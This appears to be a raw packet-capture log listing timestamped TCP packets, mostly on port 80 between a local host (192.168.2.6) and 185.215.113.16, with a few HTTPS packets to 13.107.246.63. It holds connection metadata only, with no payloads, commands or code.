                                                                                                                                                                                              Nov 24, 2024 13:39:30.312421083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.313249111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.313293934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.313463926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.314055920 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.314233065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.314320087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.315001965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.315047026 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.315155983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316109896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316195011 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316251040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316843987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316900015 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.316951990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.317569017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.317625046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.317656994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.318455935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.318581104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.318639040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.319329977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.319498062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.319545984 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.320214033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.320306063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.320363998 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.321072102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.321119070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.321192980 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.321971893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.322016954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.322063923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.322921038 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.322959900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.323016882 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.323856115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.323920965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.323997021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.324625015 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.324659109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.324771881 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.325519085 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.325587988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.325633049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.326394081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.326457977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.326544046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328012943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328093052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328115940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328145027 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328171968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.328217983 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.329014063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.329072952 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.329140902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.329986095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.330050945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.330112934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.458982944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459110022 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459192038 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459250927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459441900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459491968 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.459556103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.460469007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.460555077 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.460613012 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.461216927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.461852074 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.498864889 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.498976946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.499048948 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.499217987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.499355078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.499411106 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.500273943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.500483036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.501471996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.501527071 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.501661062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.501842976 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.502692938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.502877951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.502942085 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.503875017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.503931999 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.503982067 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.505151033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.505364895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.505419016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.506452084 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.506617069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.506673098 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.507258892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.507580996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.507641077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.507855892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.508025885 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.508702993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.508749008 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.508769989 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509382963 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509450912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509475946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509838104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509840012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509927034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.509975910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.510438919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.510493994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.510545015 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.511241913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.511382103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.511444092 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.511856079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.511960983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.512017965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.512434959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.512490988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.512546062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.513235092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.513360023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.513411045 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.513964891 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.514072895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.514134884 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.514652967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.514760971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.514811039 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.515393019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.515465975 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.515847921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.515892982 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.515957117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.516638041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.516691923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.516695023 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.516736031 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.517574072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.517700911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.517762899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.518501043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.518706083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.518754005 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.519344091 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.519398928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.520158052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.520211935 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.520276070 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.521054983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.521114111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.521182060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.521847963 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.521939993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.522047043 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.522095919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.522815943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.522943974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.522996902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.523683071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.523798943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.524574041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.524672985 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.524689913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.525511026 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.525568008 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.525618076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.525826931 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.526412010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.526539087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.526592016 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.527210951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.527357101 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.527405024 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.528111935 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.528220892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.528965950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529011965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529077053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529838085 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529844046 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529930115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.529974937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.530787945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.531035900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.531090975 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.531699896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.531860113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.531913996 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.532562017 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.532677889 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.532728910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.533351898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.533472061 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.533519030 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.534224987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.534348965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.534394979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.535128117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.535187006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.536017895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.536071062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.536129951 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.536870003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.536925077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.537005901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.537759066 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.537812948 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.537858009 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.538685083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.538746119 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.538810968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.538861990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.539694071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.539952040 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.540011883 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.540399075 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.540569067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.540627956 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.558809042 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.559578896 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:30.559607983 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.560132980 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:30.560144901 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.629430056 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.630495071 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:30.630532026 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.631023884 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:39:30.631037951 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.669611931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.669665098 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.669816971 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.669939041 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.670008898 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.670057058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.671025991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.671093941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.671200991 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.671660900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.708688021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.708784103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.708863974 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.708882093 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.708982944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.709034920 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.709779978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.709835052 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.709914923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.710666895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.710728884 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.710794926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.711559057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.711616993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.711719036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.712459087 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.712496042 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.712553978 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.713262081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.713435888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.713489056 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.714169025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.714308023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.714369059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.715092897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.715141058 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.715228081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.715945959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.716006041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.716042995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.716797113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.716855049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.716856003 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.717746973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.717807055 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.717855930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.718586922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.718636990 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.718733072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.719433069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.719494104 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.719546080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.720321894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:30.720367908 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:30.720446110 CET8049752185.215.113.16192.168.2.6
